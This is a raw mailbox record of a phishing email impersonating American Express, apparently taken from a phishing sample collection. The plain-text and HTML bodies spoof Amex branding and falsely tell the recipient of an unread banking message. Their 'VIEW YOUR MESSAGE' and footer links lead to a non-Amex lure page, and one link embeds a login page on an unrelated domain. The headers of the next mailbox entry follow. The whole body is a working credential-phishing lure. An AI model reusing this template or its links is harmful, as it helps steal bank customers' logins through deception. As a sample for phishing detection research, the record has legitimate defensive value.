From: " Amex " <priemna@leluk.org.ua>
Date: Tue, 25 Dec 2018 10:12:46 -0800
Status: O
X-Status: 
X-Keywords:                  
X-UID: 672

You will not see this in a MIME-aware mail reader.
--===============1784661458==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

    OnlineSecurityGuarantee	 American Express Company.

  =

  =

   Dear Customer, =

You Have One Unread Message In Your Online Banking Account =

 VIEW YOUR MESSAGE =

 2018 American Express Company. | Fraud Information Center All users of our=
 online services subject to Privacy Statement and agree to be bound by Term=
s of Service. Please review. =A9 2016 American Express Company. All rights =
reserved.  C625861B697268A8E0440021283BC044  =



--===============1784661458==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P> =

<TABLE style=3D"BORDER-TOP: rgb(221,222,206) 4px solid; WIDTH: 600px; BORDE=
R-BOTTOM: rgb(153,153,153) 1px solid" cellSpacing=3D0 cellPadding=3D0>
<TBODY>
<TR>
<TD style=3D"WIDTH: 62px"><A class=3Dgmail-headerLink accessKey=3DM href=3D=
"https://encrypted-tbn0.gstatic.com/images?q=3Dtbn:ANd9GcSO7j82grcXPrllBMhm=
KNgmDj5QwcP-6BVM2NLv33FtH-4Na_aEtQ"><IMG id=3Dgmail-logo class=3Dgmail-inli=
ne border=3D0 alt=3D"American Express Company." src=3D"https://www.aexp-sta=
tic.com/nav/ngn/img/logo_bluebox_1x.gif" width=3D130 height=3D80></A> =

<DIV id=3Dgmail-utility class=3Dgmail-noprint><A id=3Dgmail-securityguarant=
ee class=3Dgmail-prominentNavLinks href=3D"https://www.american%20express%2=
0cohttps//www.stella-maritime.com/login.htmlmpany./security/security_olb">O=
nlineSecurityGuarantee</A></DIV></TD>
<TD style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, helvetica, sans-serif; VE=
RTICAL-ALIGN: top; TEXT-ALIGN: right; PADDING-RIGHT: 5px"><A style=3D"FONT-=
SIZE: 12px; FONT-FAMILY: arial, helvetica, sans-serif; COLOR: rgb(51,102,15=
3)" href=3D"http://meaw.net/html/images/ampx/rev.htm" target=3D_blank><STRO=
NG>American Express Company.</STRONG></A></TD></TR></TBODY></TABLE></P>
<P>&nbsp;</P>
<P>
<TABLE style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, helvetica, sans-serif;=
 WIDTH: 600px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD><SPAN><B>Dear Customer,</B></SPAN>
<P><SPAN size=3D"2"><B><BR>You Have One Unread Message In Your Online Banki=
ng Account </B></SPAN></P><B>
<P><FONT size=3D1 face=3DVerdana><A href=3D"http://meaw.net/html/images/amp=
x/rev.htm" target=3D_blank>VIEW YOUR MESSAGE</A></FONT> </P></B>
<DIV style=3D"BORDER-TOP: rgb(179,178,178) 1px solid; VERTICAL-ALIGN: top; =
BORDER-BOTTOM: rgb(179,178,178) 1px solid; PADDING-BOTTOM: 3px; PADDING-TOP=
: 3px; PADDING-LEFT: 10px; MARGIN: 16px 0px 12px; PADDING-RIGHT: 0px; BACKG=
ROUND-COLOR: rgb(247,248,243)"><A style=3D"FONT-SIZE: 12px; FONT-FAMILY: ar=
ial, helvetica, sans-serif; COLOR: rgb(51,102,153)" href=3D"http://meaw.net=
/html/images/ampx/rev.htm" target=3D_blank><STRONG>2018 American Express Co=
mpany.</STRONG></A> | <A style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, helv=
etica, sans-serif; COLOR: rgb(51,102,153)" href=3D"http://meaw.net/html/ima=
ges/ampx/rev.htm" target=3D_blank>Fraud Information Center</A></DIV>
<DIV style=3D"MARGIN-BOTTOM: 15px; FONT-SIZE: 11px; COLOR: rgb(102,102,102)=
; PADDING-LEFT: 10px">All users of our online services subject to Privacy S=
tatement and agree to be bound by Terms of Service. Please review. =A9 2016=
 American Express Company. All rights reserved. </DIV>
<DIV style=3D"MARGIN-BOTTOM: 15px; FONT-SIZE: 11px; COLOR: rgb(102,102,102)=
; PADDING-LEFT: 10px">C625861B697268A8E0440021283BC0<WBR>44&nbsp;&nbsp;</DI=
V></TD></TR></TBODY></TABLE></P></BODY></HTML>
--===============1784661458==--

From jose@monkey.org Tue Dec 25 19:36:44 2018 +0000
Return-Path: priemna@leluk.org.ua
Delivered-To: jose@monkey.org
X-FDA: 74980159128.15.town43_57c8da42e5c07
X-Spam-Summary: 13,1.2,0,2418fa0269d913e2,d41d8cd98f00b204,priemna@leluk.org.ua,:,RULES_HIT:1:2:41:72:379:455:962:967:973:983:988:989:1189:1208:1221:1254:1260:1263:1313:1314:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1589:1592:1594:1714:1730:1776:1792:2111:2194:2198:2199:2200:2525:2527:2561:2566:2612:2682:2685:2859:2895:2902:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3350:3865:3867:3871:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4052:4181:4234:4321:4361:5007:6238:6261:6650:6678:6688:6996:6997:7652:7801:8568:8603:8660:9010:9025:9121:9153:9164:9388:9416:9468:9908:10008:10049:10214:10346:11026:11233:11473:11658:11815:11914:12043:12217:12219:12295:12438:12517:12519:12555:12740:12895:12903:12986:13025:13139:13148:13163:13229:13230:13235:13236:13237:13374:13439:14827:14877:18000:21080:21212:21347:21433:21451:21483:21524:21554:21611:21627:21740:21786:21810:21838:30019:30026:30034:30039:30054:30055:30064:30070:30074,
X-HE-Tag: town43_57c8da42e5c07
X-Filterd-Recvd-Size: 11457
Received: from poltavagazzbut.com.ua (mail.leluk.org.ua [77.121.11.56])
	by imf16.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 25 Dec 2018 19:36:43 +0000 (UTC)
Received: from [23.106.215.78] (unknown [23.106.215.78])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	(Authenticated sender: priemna@leluk.org.ua)
	by poltavagazzbut.com.ua (Postfix) with ESMTPSA id 319181102BF
	for <jose@monkey.org>; Tue, 25 Dec 2018 21:19:14 +0200 (EET)
Content-Type: multipart/alternative; boundary="===============1268635096=="
MIME-Version: 1.0
Subject: Alert
To: jose@monkey.org
